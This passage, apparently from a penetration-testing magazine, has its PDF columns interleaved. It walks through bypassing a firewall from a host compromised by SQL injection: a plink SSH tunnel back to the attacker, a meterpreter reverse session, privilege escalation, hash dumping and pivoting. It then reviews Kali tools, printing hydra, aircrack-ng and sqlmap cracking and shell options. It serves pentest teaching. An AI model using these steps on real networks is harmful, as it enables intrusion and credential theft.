mote machine). From this shell, we can execute commands more
The first step is to analyze what we can do from conveniently than using SQL injection.
the remote machine, where can we connect, what To see what ports we can use, just repeat the
ports and protocols can we use, etc. procedure trying other ports.
To achieve our final goal, we need at least two
Analyze what allow the firewall ports, cause we need two different sessions, one
We know that the remote host can make connec- to create the ssh tunnel, and another to execute
tions to the Internet on port 21 (FTP), since it is the payload.
precisely what we have done to upload our pay- Surely someone asks why would we do this if we
load before. already have a remote shell on the victim host?.
Usually, many firewall configurations, block both The answer is easy. There are different techniques
inbound and outbound traffic on a LAN, except for that allow us to escalate privileges and pivot to
certain allowed services, such as world wide web, other systems, but a meterpreter session makes
ftp, ssh, etc. Other more permissive configurations things easier, both to escalate (with getsystem) as
allow any connection from inside the LAN to the In- to pivot, using the session as gateway to the vic-
ternet and just blocks the incoming traffic to a non tims LAN.
allowed services. In the present case, after making several tests
We need to find which ports can we use to con- with netcat I could see that from inside the LAN
nect. To find it out, we try to connect from the re- had unrestricted access to the Internet.

SSH Tunnels 10.10.0.1, the IP address within the LAN from the
Once satisfied that we can connect any port with SSH Server is 192.168.0.10 and the IP address of
netcat, now is the turn of plink.exe our SSH cli- the Windows Server is 192.168.0.11.
ent for windows. We launch or ssh tunnel like this:
The goal is to make an SSH connection from the
victim system, to our host (Kali Linux). root@kali:~# ssh L 6666:192.168.0.11:3389
And why we want to connect to our host? Easy 10.10.0.1
too, because SSH allows port forwarding between
hosts using the established SSH connection. As This connects our local port 6666 to port 3389 on
you know, an SSH connection is encrypted and host 192.168.0.11 (Windows Server). Now we can
firewalls usually allow it if its coming from within connect to Server using rdesktop like this:
the LAN to the Internet.
The purpose of this is to make an ssh tunnel for- root@kali:~# rdesktop localhost:6666
warding the port 6666 on the remote host (the vic-
tim) to port 6666 on local host, making everything Remote port forwarding
you send to port 6666 on the remote host going to Remote port forwarding creates a socket on the
port 6666 on local host. SSH server host connected to the host and port
Now, we have to create a meterpreter payload you specify. The host must be reachable by the
connecting to 127.0.0.1:6666 and on the other end SSH Server host. Basically it is the same as local
of the tunnel, we have to set up a Metasploit han- port forwarding, the difference is that socket is cre-
dler on port 6666 of the local IP address. ated on the remote machine.
Well, first lets see how SSH tunnels works. Suppose the example above, but now instead of
SSH allows 3 types of port forwarding, local port having access to an SSH server, we just have ac-
forwarding, remote port forwarding and dynamic cess to a host with an SSH client. We need to con-
port forwarding. figure an SSH server on our local host and launch
the client from the remote host to our server re-
Local Port Forwarding directing port 6666 on the local host (which now
Local port forwarding allows us to open a socket has the SSH server) to port 3389 of internal Win-
on the local host connected to a port on remote dows host (host reachable by the SSH client re-
host. Comunication flows from local to remote. mote host).
The command syntax is: The syntax is as follows:
ssh L <local port>:<remote host>:<remote port> ssh R <server port to open>:<remote host>:<remote
<gateway> port> <server>
Example: Example (executed from a host in 192.168.0.0/24

lan):
ssh L 6666:www.gmail.com:80 SSH-SERVER
ssh R 6666:192.168.0.11:3389 SSH-SERVER
The above example would connect the local port
6666 to port 80 on www.gmail.com through the After running this, the local host can launch
SSH-SERVER. If we opened the browser from local rdesktop to connect to the Windows server.
host and visit http://localhost:6666 we would access
the Gmail website and Google logs would see the root@kali:~# rdesktop localhost:6666
connection coming from the SSH-SERVER.
This is very useful for a penetration test in the Dynamic port forwarding
following case. Imagine you have ssh access to a This type of forwarding creates a SOCKS proxy
host located on the LAN of our client behind a NAT on the specified port on the client host that can be
firewall, which in turn is connected to other host on used by programs such as proxychains to reach
the LAN where there is a Server with a Terminal remote networks using the tunnel as gateway.
Server enabled only to receive connections from The syntax is:
the LAN.
Suppose the public IP address of the firewall is ssh D <port> <server>

SCENARIOS
Example: You cant avoid this, but you can go arround. We
can invoke plink.exe for the first time against a
root@kali:~# ssh D 9050 10.10.0.1 host like this:
This example creates a SOCKS proxy on port C:\>echo y | plink.exe l user pw password SSH-
9050 on the local host from which we can reach SERVER
any port of any host within the SSH Server LAN
(we can reach any host the SSH Server host can The command will invoke plink.exe and when
reach). asked if you want to add the unknown server key to
Following with the same scenario, now we config- the cache, it will pass the character y and plink will
ure proxychains to use the port 9050 of localhost, save the key and will go with its normal execution.
and then reach the terminal server at 192.168.0.11 Since then, we have gotten the remote host key
with the following command: in the host putty cache, which can be found on
Windows registry, in the key HKEY_CURRENT_
root@kali:~# proxychains rdesktop 192.168.0.11 USER\Software\SimonTatham\PuTTY\SshHost-
Keys. If you need to open a second SSH tunnel
OpenSSH and Putty against the same host, invoke the echo y is no
After seeing how SSH tunnels work, it is quite clear longer necessary.
that what we need to make the connection from Well, suppose the following scenario (for demo
the remote host to our attacking host, using local purposes we use two private IP address ranges.
port forwarding to open a port on the remote host 10.10.0.x stands for public addresses):
that connect to a port of our local host.
SSH is an interactive command. When we in- Public IP attacker machine: 10.10.0.10
voked it to connect to a remote host, first check the Firewall public IP: 10.10.0.20
RSA signature of the host and if it does not know Network IP LAN: 192.168.65.0/24
that host, asks if you want to connect. If yes, then Private IP Firewall: 192.168.65.254
asks the password for the user you specified when Private IP from host behind the firewall:
invoking the command. 192.168.65.10
When working from a console achieved via net- Private IP from second host behind the firewall:
cat or directly from SQL injection, we cant use 192.168.65.15
this type of interactive commands because do not
have access to the various standard file descrip- First, we create our meterpreter payload pointing
tors and therefore the command will wait for a re- to port 6666 of 127.0.0.1 (localhost). This payload
sponse that can not be sent. when invoked from a Windows host will make a
To fix this, we can invoke ssh (were talking spe- connection to itself (127.0.0.1) on port 6666.
cifically about OpenSSH, which is the most widely
used SSH package on Linux http://www.openssh.
org/) with the -o UserKnownHostsFile =/dev/null
-o StrictHostKeyChecking=no to not check the sig-
nature of the remote server, and also in the case
of ssh Unix/Linux, we can put the public RSA key
of the user who attempt to connect to the remote Figure 2. The creation of a meterpreter reverse tcp shell in
binary form with msfvenom
host in the file .authorized_keys so we do not ask
for the password. We upload this payload, plink.exe and nc.exe
In this case, we will use plink.exe from Windows. to the victim host. Once uploaded the three files,
Here you can specify the -l user -pw password to first make a connection with netcat to have a con-
pass the username and password without having sole where execute commands cause will always
to copy the RSA keys. be more comfortable than any SQL injection or
Plink is the command line version of an SSH PHP Shell.
client known as Putty, widely used in Windows Note that the connection to our host comes
environments. Plink offers no parameter to avoid from 10.10.0.20, but the IP of the remote host is
checking server key, so first time we connect to 192.168.65.10. That is cause the host is behind a
a new host will show the save RSA message. NAT Firewall.

handler will come through the tunnel and there-
fore will be from the end of the tunnel on the host
itself to port 6666.
Figure 3. Establish a remote session using netcat Figure 6. Configuration of the Metasploit multi handler to
get the reverse meterpreter session
Now using plink.exe we must create an SSH Once the entire stage set, just execute the pay-
tunnel to connect the port 6666 of the remote host load met.exe on the remote box. Once executed,
(compromised host) to port 6666 on the local host the handler on the local host will receive the con-
(port numbers can be any, but then you have to nection and send the stage for opening the ses-
create the payload to use those you decide). sion. The following picture shows it.
Figure 7. Meterpreter reverse session opened on the attacker

host
BINGO!!! We have a meterpreter session on

the remote host bypassing the next generation
Figure 4. Establish an ssh connection back from remote
compromised host to attacker host forwarding port 6666 on Firewall.
remote host to port 6666 on attacker host As seen in the image, Metasploit sees the con-
nection coming from 10.10.0.10 (the IP of the
Once the SSH connection established, you can host itself). This is because the connection comes
see port 6666 in windows machine in LISTEN- through the SSH tunnel.
ING state. Once we achieve our goal, we can use this ses-
sion to pivot and try to attack other boxes on the
local network 192.168.65.0/24.
On the meterpreter session we can use the script
arp_scanner to find hosts on the network to at-
tack. The following figure shows the operation of
the script.
Figure 5. Port 6666 open and listening on remote

compromised host
Figure 8. Using arp_scanner meterpreter script to discover
Now on the local host (attacker), we set up a more hosts on the compromise network
Metasploit handler with the same payload that
we have created and uploaded to the windows The next picture shows how to escalate privileg-
box listening on port 6666 (the port that we con- es using getsystem meterpreter command, how
figured in the ssh tunnel). As LHOST put the IP to capture the auth hashes of the compromised
of the local host because the connection to the box, and how to add a route to Metasploit for using

SCENARIOS
the opened session (number 1 in this example), to very expensive. Passive monitoring can be
reach the 192.168.65.0/24 network. very useful, while more economical). It will al-
low us to find anomalous behavior within the
LAN, caused by possible failures, malware
or intruders.
A network Antivirus and Antimalware. Usual-
ly in the firewall itself, or the router if they are
separate devices.
Host Antivirus and Antimalware. Although it
is known that only really serve to identify old
threats, this component will prevent hosts from
becoming infected with most malware and vi-
ruses on the Internet. They will not help much
against a targeted attack, but will force the in-
Figure 9. Escalate privileges with get_system, dump hashes
from compromised host and configure a route in Metasploit truder to try harder.
to reach the remote network from the attacker host DMZ. If we have hosts exposing services to
the Internet, it is more than advisable to cre-
After adding the route, we can use any Metasploit ate a demilitarized zone (DMZ) where place
module (psexec comes to my mind) against hosts those hosts, separate from the LAN by a fire-
on the LAN, but that is beyond the scope of this wall (Firewall may be the same perimeter that
article. has 3 zones, or another Firewall).
Periodic review of the security elements and
Conclusions policies (the measures that work today may-
I think we all agree that every company needs a be dont work against tomorrows attacks). It is
firewall that separates their local network from the recommended to pass a Penetration Test once
Internet, but we must be aware that a firewall can a year or two, especially if we publish services
not be the only element of network security. and hosts to the Internet.
In this article we have seen how in some cases
the firewall detects malicious code and is capable
of blocking the connections, but also demonstrat-
ed how easy it is to bypass this restriction.
A firewall, even the most expensive one cant Ignacio Sorribas
protect an entire network infrastructure from being My name is Ignacio Sorribas, I am Computer Engineer from
attacked. It must be one element of the companys the Universitat Jaume I in Castelln and computer security
security policy, being the first line of security be- specialist with over 7 years of experience and CISSP , OSCP ,
tween the Internet and the LAN, but not the only. CCNA and CCNA Security certifications. My specialty is Pene-
The better choice, is the deployment of a de- tration Testing in Web environments and data networks.
fense in depth strategy, which means it must be Currently working as a Senior IT Security Analyst (PenTester) in
implemented so many layers of security as pos- Advanced Technologies for Security SLU (AT4Sec).
sible (like an onion), always keeping in mind the I am also an external teacher of Security courses in Universi-
value of what we are trying to protect and the cost tat Politcnica de Valencia (UPV) and Universitat Jaume I de
of the security measures deployed. Castelln (UJI), where I show PenTesting techniques and tools,
So, all network infrastructure should have vari- focusing on Metasploit Framework and related tools. At UPV,
ous security measures. Based on my experience participate in the Computer Security Course from the Life-
as a consultant, I would recommend at least the long Learning Centre (CFP), and at UJI, participate on the Se-
following: curity Course Attack and Defense from the Enterprise Uni-
versity Foundation (FUE).
Perimeter Firewall (first line of defense). It must I am also a proud father and husband. I have two little boys
bear all required network traffic, and the more (hackers in way) and a wonderful wife.
features possesses the better. In my free time, I like to practice all the sports that I can,
Traffic Monitoring System (We must try to be whether running, playing handball, go biking, etc.. My great
aware of everything that goes through our passion is kiteboarding, but unfortunately I can no longer
network in real-time if possible, but it can be spend much time on it.

TOOLS
The Top 10 Kali Linux

Security Tools
Kali Linux is a bare-metal rebuild of the popular security tool-
kit Backtrack. The funding and development comes from the
Offensive Security Team.
K
ali Linux is designed as a single-purpose more or less. Some of the tool links are to sections
tool-kit for network penetration testing and of a single tool for instance: there are several links
forensic audit, so it is missing some of the to different areas of the Metasploit Framework; and
more general applications. There are no games there are links to start and stop Apache2 HTTPD,
visible in the main menu on Kali by default, though MySQL, Metasploit, OpenVAS, BeeF, Dradis and
you might have so much fun with the content of the SSH-server. As you will see below, Metasploit
Kali directory (Figure 2) that you never really no- Framework gets its own subcategory.
tice the lack. The security applications are listed in
by category and subcategory. There are 432 tools, Kali Categories and Sub-Categories
Top 10 Security Tools
Figure 1. Kali Linux Figure 2. Kali Linux Tools

Aircrack-ng Online Attacks
burpsuite
hydra Wireless Attacks
john (the ripper)
maltego 802.11 Wireless Tools
metasploit framework Bluetooth Tools
nmap Other Wireless Tools
owasp-zap RFID / NFC Tools
sqlmap
wireshark Exploitation Tools
Information Gathering BeEF XSS Framework

Cisco Attacks
DNS Analysis Exploit Database
IDS/IPS Identification Metasploit *
Live Host Identification Network Exploitation
Network Scanners Social Engineering Toolkit
OS Fingerprinting
OSINT Analysis Sniffing/Spoofing
Route Analysis
Service Fingerprinting Network Sniffers
SMB Analysis Network Spoofing
SMTP Analysis Voice and Surveilance
SNMP Analysis VoIP Tools
SSL Analysis Web Sniffers
Telephony Analysis
Traffic Analysis Maintaining Access
VoIP Analysis
VPN Analysis OS Backdoors
Tunneling Tools
Vulnerability Analysis Web Backdoors
Cisco Tools Reverse Engineering

Database Assessment
Fuzzing Tools Debuggers
Misc Scanners Disassembly
Open Source Assessment Misc RE Tools
OpenVAS
Stress Testing
Web Applications
Network Stress Testing
CMS Identification VoIP Stress Testing
Database Exploitation Web Stress Testing
IDS/IPS Identification WLAN Stress Testing
Web Application Fuzzers
Web Application Proxies Hardware Hacking
Web Crawlers
Web Vulnerability Scanners Android Tools
Arduino Tools
Password Attacks
Forensics
GPU Tools
Offline Attacks Anti-Virus Forensics Tools

TOOLS
Digital Anti-Forensics Original work: Christophe Devine
Digital Forensics http://www.aircrack-ng.org
Forensic Analysis Tools usage: aircrack-ng [options] <.cap / .ivs
Forensic Carving Tools file(s)>
Forensic Hashing Tools
Forensic Imaging Tools Common options:
Forensic Suites
Network Forensics -a <amode>: force attack mode (1/WEP, 2/WPA-
Password Forensics Tools PSK)
PDF Forensics Tools -e <essid>: target selection: network identifier
RAM Forensics Tools -b <bssid>: target selection: access point's MAC
-p <nbcpu>: # of CPU to use (default: all CPUs)
Reporting Tools -q: enable quiet mode (no status output)
-C <macs>: merge the given APs to a virtual one
Documentation -l <file>: write key to file
Evidence Management
Media Capture Static WEP cracking options:
System Services -c: search alpha-numeric characters only

-t: search binary coded decimal chr only
BeEF -h: search the numeric key for Fritz!BOX
Dradis -d <mask>: use masking of the key (A1:XX:
HTTP CF:YY)
Metasploit * -m <maddr>: MAC address to filter usable
MySQL packets
OpenVAS -n <nbits>: WEP key length: 64/128/152/
SSH 256/512
-i <index>: WEP key index (1 to 4), default: any
The Top 10 Security Tools -f <fudge>: bruteforce fudge factor, default: 2
This article is not the place to detail the features of -k <korek>: disable one attack method (1 to 17)
all these tools, but perhaps the tools that the devel- -x or -x0: disable bruteforce for last keybytes
opers consider to be the top ten could be covered -x1: last keybyte bruteforcing (default)
to some benefit to people considering putting Kali -x2: enable last 2 keybytes bruteforcing
into their network security toolbox. -X: disable bruteforce multithreading
-y: experimental single bruteforce mode
Aircrack-ng -K: use only old KoreK attacks (pre-PTW)
http://www.aircrack-ng.org -s: show the key in ASCII while cracking
Description (from the project site) -M <num>: specify maximum number of IVs to use
Aircrack-ng is an 802.11 WEP and WPA-PSK -D: WEP decloak, skips broken keystreams
keys cracking program that can recover keys once -P <num>: PTW debug: 1: disable Klein, 2: PTW
enough data packets have been captured. It imple- -1: run only 1 try to crack key with PTW
ments the standard FMS attack along with some
optimizations like KoreK attacks, as well as the WEP and WPA-PSK cracking options:
all-new PTW attack, thus making the attack much
faster compared to other WEP cracking tools. -w <words>: path to wordlist(s) filename(s)
In fact, Aircrack-ng is a set of tools for auditing
wireless networks. WPA-PSK options:
Review -E <file>: create EWSA Project file v3

-J <file>: create Hashcat Capture file
Aircrack-ng Help -S: WPA cracking speed test
Aircrack-ng 1.2 beta1 (C) 2006-2010 Thomas -r <DB>: path to airolib-ng database (Cannot be
d'Otreppe used with -w)

Other options: The ability to save your work and resume work-
ing later.
-u: Displays # of CPUs & MMX/SSE support Extensibility, allowing you to easily write your
--help: Displays this usage screen own plugins, to perform complex and highly cus-
tomized tasks within Burp.
You can crack weak passwords on WEP or WPA-
encrypted networks. Review
To use the BurpSuite, you need to set the tool as
Burpsuite your web browser's proxy. You can then spider sites
http://portswigger.net/burp/ and choose which attack modes you are going to
Description (from the project site) use to attack specific vulnerabilities (Figure 3).
Burp Suite is an integrated platform for perform-
ing security testing of web applications. Its various Hydra
tools work seamlessly together to support the en- http://www.thc.org/thc-hydra/
tire testing process, from initial mapping and anal- Description (from the project site)
ysis of an application's attack surface, through to A very fast network logon cracker which supports
finding and exploiting security vulnerabilities. many different services.
Burp gives you full control, letting you combine
advanced manual techniques with state-of-the-art Review
automation, to make your work faster, more effec- Hydra v7.5 (c)2013 by van Hauser/THC & David
tive, and more fun. Maciejak for legal purposes only.
Burp Suite contains the following key components: Syntax: hydra [[[-l LOGIN|-L FILE] [-p
An intercepting Proxy, which lets you inspect and PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE]
modify traffic between your browser and the target [-t TASKS] [-M FILE [-T TASKS]] [-w TIME]
application. [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET]
An application-aware Spider, for crawling con- [-SuvV46] [service://server[:PORT][/OPT]].
tent and functionality.
An advanced web application Scanner, for auto- Options:
mating the detection of numerous types of vulner-
ability. -R restore a previous aborted/crashed session
An Intruder tool, for performing powerful custom- -S perform an SSL connect
ized attacks to find and exploit unusual vulnerabili- -s PORT if the service is on a different default
ties. port, define it here
A Repeater tool, for manipulating and resending -l LOGIN or -L FILE login with LOGIN name, or
individual requests. load several logins from FILE
A Sequencer tool, for testing the randomness of -p PASS or -P FILE try password PASS, or load
session tokens. several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce genera-
tion, type -x -h to get help
-e nsr try "n" null password, "s" login as pass and/
or "r" reversed login
-u loop around users, not passwords (effective!
implied with -x)
-C FILE colon separated login:pass format, in-
stead of -L/-P options
-M FILE list of servers to be attacked in parallel,
one entry per line
-o FILE write found login/password pairs to FILE
instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f
per host, -F global)
-t TASKS run TASKS number of connects in par-
Figure 3. BurpSuite allel (per host, default: 16)

TOOLS
-w / -W TIME waittime for responses (32s) / be- Examples:
tween connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses hydra -l user -P passlist.txt ftp://192.168.0.1
-v / -V / -d verbose mode / show login+pass for hydra -L userlist.txt -p defaultpw
each attempt / debug mode imap://192.168.0.1/PLAIN
-U service module usage details server the target hydra -C defaults.txt -6 pop3s://
server (use either this OR the -M option) ser- [fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
vice the service to crack (see below for sup-
ported protocols) OPT some service modules John (the Ripper)
support additional input (-U for module help) http://www.openwall.com/john/
Description (from the project site)
Supported services: asterisk afp cisco cisco-en- John the Ripper is a fast password cracker, cur-
able cvs firebird ftp ftps http[s]-{head|get} rently available for many flavors of Unix, Windows,
http[s]-{get|post}-form http-proxy http-proxy- DOS, BeOS, and OpenVMS. Its primary purpose
urlenum icq imap[s] irc ldap2[s] ldap3[- is to detect weak Unix passwords. Besides several
{cram|digest}md5][s] mssql mysql ncp nntp crypt(3) password hash types most commonly found
oracle-listener oracle-sid pcanywhere pcnfs on various Unix systems, supported out of the box
pop3[s] postgres rdp rexec rlogin rsh sip smb are Windows LM hashes, plus lots of other hashes
smtp[s] smtp-enum snmp socks5 ssh sshkey svn and ciphers in the community-enhanced version.
teamspeak telnet[s] vmauthd vnc xmpp
Review
Hydra is a tool to guess/crack valid login/pass- John is a very effective password cracker, with a
word pairs usage only allowed for legal purpos- large following in the IT Security Community. There
es. This tool is licensed under AGPL v3.0. are several hashes John can crack (Figure 4).
The newest version is always available at http://
www.thc.org/thc-hydra. Maltego
These services were not compiled in: sapr3 or- http://www.paterva.com/web6/products/maltego.php
acle. Description (from the project site)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY With the continued growth of your organization,
and HYDRA_PROXY_AUTH environment for a the people and hardware deployed to ensure that
proxy. E.g.: it remains in working order is essential, yet the
threat picture of your?nvironmentis not always
% export HTTP_PROXY=socks5://127.0.0.1:9150 (or clear or complete. In fact, most often it? not what
socks4:// or connect://) we know that is harmful it? what we don? know
% export HTTP_PROXY_HTTP=http://proxy:8080 that causes the most damage. This being stated,
% export HTTP_PROXY_AUTH=user:pass how do you develop a clear profile of what the cur-
rent deployment of your infrastructure resembles?
What are the cutting edge tool platforms designed
to offer the granularity essential to understand the
Figure 4. John the Ripper Figure 5. Maltego

complexity of your network, both physical and re- The version of Metasploit included with Kali does
source based? Maltego is a unique platform devel- not act as a service, but must be started when you
oped to deliver a clear threat picture to the envi- want to use it.
ronment that an organization owns and operates.
Maltego? unique advantage is to demonstrate the
complexity and severity of single points of failure
as well as trust relationships that exist currently
within the scope of your infrastructure.
The unique perspective that Maltego offers to
both network and resource based entities is the
aggregation of information posted all over the in-
ternet whether it? the current configuration of a
router poised on the edge of your network or the
current whereabouts of your Vice President on his
international visits, Maltego can locate, aggregate
and visualize this information.
Maltego offers the user with unprecedented in-
formation. Information is leverage. Information is
power. Information is Maltego (Figure 5).
Review
From hosts to users to emails and messages to
infrastructure and even weapons, Maltego gives
you a way to visualize your environment in a very
information-rich way. Maltego lets you track rela- Figure 6. Metasploit
tionships and entities in 11 different ways and lets
you visualize them all three ways; main view, buble The first time you go to https://localhost:3790/
view and as an asset list. Very interesting tool. you see a new-user registration. Once your pass-
word is approved, Metasploit lets you insert the
Metasploit Framework key code you got through registering on their site.
http://www.metasploit.com/
Reduce the risk of a data breach by download-
ing our penetration testing solutions. Discover how
vulnerabilities become real risks as you test the
defenses of your own network, using the same
methods as an outside attacker. Our penetration
testing software gives you a clear view as to what
vulnerabilities can easily be exploited within your
environment so you can focus on the most critical
vulnerabilities.
Safely simulate attacks on your network to un-
cover pressing security issues. Use with Nexpose
to assess and validate security risks in your en-
vironment. Verify your defenses, security controls
and mitigation efforts. Manage phishing exposure,
and audit web applications.
Review Figure 7. Metasploit Registration

Metasploit has a client-server architecture, like
Nessus, OpenVAS and Apache httpd. It is possible To run Metasploit, start a new project, name
to install Metasploit as a service so that it starts the it give it a description if you want and set the IP
metasploit server whenever the host is booted up. range you are testing (see Figure 7).

TOOLS
Nmap (Network Mapper is an open source tool
for network exploration and security auditing. It
was designed to rapidly scan large networks, al-
though it works fine against single hosts. Nmap
uses raw IP packets in novel ways to determine
what hosts are available on the network, what ser-
vices (application name and version) those hosts
are offering, what operating systems (and OS ver-
sions) they are running, what type of packet filters/
firewalls are in use, and dozens of other charac-
teristics. While Nmap is commonly used for secu-
rity audits, many systems and network administra-
tors find it useful for routine tasks such as network
inventory, managing service upgrade schedules,
and monitoring host or service uptime.
Review
Figure 8. Nmap NMap, which has been around since 1996, is one
of the main open-source tools in any network ad-
The first step of the Metasploit scan is a Discov- ministrator's toolbox. This researcher has used
ery phase, which initiates an NMap -A T4 IP-range NMap for mapping networks, checking for running
test (Figure 9) and then proceeds through NetBI- services, troubleshooting connectivity problems
OS probes and about 100 other tests. and checking network routes available for about
After the Discovery phase, you have an analy- ten years (Figure 10).
sis of hosts, ports open, services, vulnerabilities The basic command-set is pretty easy to learn,
and data captured. In the test network there were and the documentation is very good. The only
5 hosts and 27 services running on open ports, but thing NMap won't do is map a network by NetBIOS
no listed vulnerabilities. Rest assurred, the aver- names and return IP addresses.
age LAN would have a few vulnerabilities.
Nmap
http://nmap.org/
Figure 10. Nmap
Figure 9. Discovery phase with matasploit Figure 11. Nmap results

You do not have to run NMap as root on a UNIX One feature of NMap is its GUI counterpart, ZenMap.
or Linux platform or as an Administrator on Win- Zenmap shows the CLI command the user would be
dows, but some NMap functions need to be root to entering in a terminal emulator, so even for extremely
work properly. Since Kali Linux is designed to be a command-line-averse administrators gets subliminal
specialized toolkit, you don't have to be concerned training in how to use NMap on the CLI. ZenMap is
about whether you started NMap as root or not. You included in the Kali Linux Full ISO (Figure 12).
are always logged in as root on the default setup.
The example in the image below, nmap -A -T5, is OWASP-zap
a scan of 1000 popular ports, checking for servic- https://www.owasp.org/index.php/OWASP_Zed_
es with very aggressive timing. Timing goes from Attack_Proxy_Project
T1 (paranoid) to T3 (standard) to T5 (Very Aggres- Description (from the project site)
sive). In my test network (wireless, by the way), The Zed Attack Proxy (ZAP) is an easy to use in-
there is an Ubuntu laptop and a Brother printer. tegrated penetration testing tool for finding vulner-
NMap was accurate about the ports open and ser- abilities in web applications.
vices available. The printer would have to have the It is designed to be used by people with a wide
telnetd shut down and the anonamous FTP access range of security experience and as such is ideal
removed if it were going to pass a PCI-DSS audit. for developers and functional testers who are new
Lucky this network segment has no customer card to penetration testing.
data passing through it (Figure 11). ZAP provides automated scanners as well as a
set of tools that allow you to find security vulner-
abilities manually.
Review
The OWASP Zed Attack Proxy needs Java7. The
interface is simple and works pretty quickly. The
image below shows a spidering attack on a site.
There are over 3400 URIs on the site (Figure 13).
You can also send tailored HTTP requests and
responses with OWASP-ZAP.
SQLmap
http://sqlmap.org/
sqlmap is an open source penetration testing tool
that automates the process of detecting and exploit-
ing SQL injection flaws and taking over of database
Figure 12. ZenMap
Figure 13. OWASP-zap Figure 14. SQLmap

TOOLS
servers. It comes with a powerful detection engine, --level=LEVEL Level of tests to perform (1-5, de-
many niche features for the ultimate penetration fault 1)
tester and a broad range of switches lasting from --risk=RISK Risk of tests to perform (0-3, default 1)
database fingerprinting, over data fetching from the
database, to accessing the underlying file system Techniques:
and executing commands on the operating system These options can be used to tweak testing of
via out-of-band connections (FIgure 14). specific SQL injection techniques.
Review --technique=TECH SQL injection techniques to

The basic command set is at use (default "BEUSTQ")
sqlmap.py -h Enumeration
These options can be used to enumerate the
Options: back-end database management system informa-
tion, structure and data contained in the tables.
-h, --help Show basic help message and exit Moreover you can run your own SQL statements
-hh Show advanced help message and exit
--version Show program's version number and exit -a, --all Retrieve everything
-v VERBOSE Verbosity level: 0-6 (default 1) -b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
Target: --current-db Retrieve DBMS current database
At least one of these options has to be provided --passwords Enumerate DBMS users password
to set the target(s) hashes
--tables Enumerate DBMS database tables
-u URL, --url=URL Target URL (e.g. "www.target. --columns Enumerate DBMS database table col-
com/vuln.php?id=1") umns
-g GOOGLEDORK Process Google dork results --schema Enumerate DBMS schema
as target URLs --dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables
Request: entries
These options can be used to specify how to -D DB DBMS database to enumerate
connect to the target URL -T TBL DBMS database table to enumerate
-C COL DBMS database table column to enu-
--data=DATA Data string to be sent through POST merate
--cookie=COOKIE HTTP Cookie header
--random-agent Use randomly selected HTTP Us- Operating system access:
er-Agent header These options can be used to access the back-
--proxy=PROXY Use a proxy to connect to the tar- end database management system underlying
get URL operating system
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly --os-shell Prompt for an interactive operating
system shell
Injection: --os-pwn Prompt for an OOB shell, meterpreter
These options can be used to specify which pa- or VNC
rameters to test for, provide custom injection pay-
loads and optional tampering scripts General:
These options can be used to set some general
-p TESTPARAMETER Testable parameter(s) working parameters
--dbms=DBMS Force back-end DBMS to this value
--batch Never ask for user input, use the default
Detection: behaviour
These options can be used to customize the de- --flush-session Flush session files for current
tection phase target

Miscellaneous: many protocols, including IPsec, ISAKMP, Kerbe-
ros, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
--wizard Simple wizard interface for beginner users Coloring rules can be applied to the packet list for
[!] to see full list of options run with -hh quick, intuitive analysis Output can be exported to
[*] shutting down at 23:34:40 XML, PostScript?, CSV, or plain text (Figure 15).
The Wizard is interesting. Designed for beginners, Review

it gives a series of questions to help construct the Wireshark is one of the best traffic-analysis tools
sqlmap query. either open-source or proprietary. On any given
day, hundreds of network administrators and secu-
Wireshark rity researchers are running wireshark on their net-
http://www.wireshark.org/ work to discover the traffic patterns in the network.
Wireshark is the worlds foremost network proto- Notes on Installing Kali
col analyzer. It lets you see whats happening on There are currently ports of Kali Linux for 64-Bit,
your network at a microscopic level. It is the de 32-Bit, ARMEL, and ARMHF. This researcher
facto (and often de jure) standard across many in- downloaded the 64-Bit full-version to make a test-
dustries and educational institutions. bed in Oracle VirtualBox on one machine, and
Wireshark development thrives thanks to the both the 32-Bit Full ISO and the 32-Bit Mini ISO to
contributions of networking experts across the test on an older 32-Bit test machine. The Mini ISO
globe. It is the continuation of a project that started is strictly the core of the Kali operating system, so
in 1998. it is only 20MB to download, and it uses tasksel
in the install to let the user add the features that
Features are not standard, such as laptop code, HTTPD,
Wireshark has a rich feature set which includes the MySQL and so on.
following: The 64-Bit Full-ISO install went very quickly with
practically no user interaction. The 32-Bit Mini ISO
Deep inspection of hundreds of protocols, with has taken more than a day to install, and has re-
more being added all the time quired several user interactions, and crashed at
Live capture and offline analysis the end. The lesson here appears to be that the
Standard three-pane packet browser Mini ISO which is having to download all its soft-
Multi-platform: Runs on Windows, Linux, OS X, ware during the installation may suffer from net-
Solaris, FreeBSD, NetBSD, and many others work timeouts. The 64-Bit and 32-Bit Full ISO give
Captured network data can be browsed via a the user a choice to use it as a live disk, which
GUI, or via the TTY-mode TShark utility is useful in forensic research, where it is impor-
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats:

tcpdump (libpcap), Pcap NG, Catapult DCT2000,
Cisco Secure IDS iplog, Microsoft Network Mon-
itor, Network General Sniffer? (compressed and
uncompressed), Sniffer? Pro, and NetXray?, Net-
work Instruments Observer, NetScreen snoop,
Novell LANalyzer, RADCOM WAN/LAN Analyzer,
Shomiti/Finisar Surveyor, Tektronix K12xx, Visual
Networks Visual UpTime, WildPackets EtherPeek/
TokenPeek/AiroPeek, and many others Capture
files compressed with gzip can be decompressed
on the fly Live data can be read from Ethernet,
IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB,
Token Ring, Frame Relay, FDDI, and others (de-
pending on your platform) Decryption support for Figure 15. Wireshark

TOOLS
tant not to alter the state of the hard drives and in col, bandwidth and connection origin and destina-
places where the machine used for testing may be tion (Figure 17). This screen-capture of EtherApe
compromised already (Figure 16). was captured with G.I.M.P..
A bare-metal installation from the 32-Bit full-
ISOon an old laptop worked flawlessly, so the test- All the Tools (De-Duplicated)
ing went on from that platform.
0trace casefile
Missing Applications acccheck cdpsnarf
Though Kali is a Debian derivative and most Debi- ace cewl
an packages appear to be available using apt-get affcat chkrootkit
or your favorite package manager, the three pack- affcompare chntpw
ages that would have made this a perfect default affconvert cisco-auditing-tool
installation are: Apache OpenOffice or Libre Office, affcopy cisco-global-exploiter
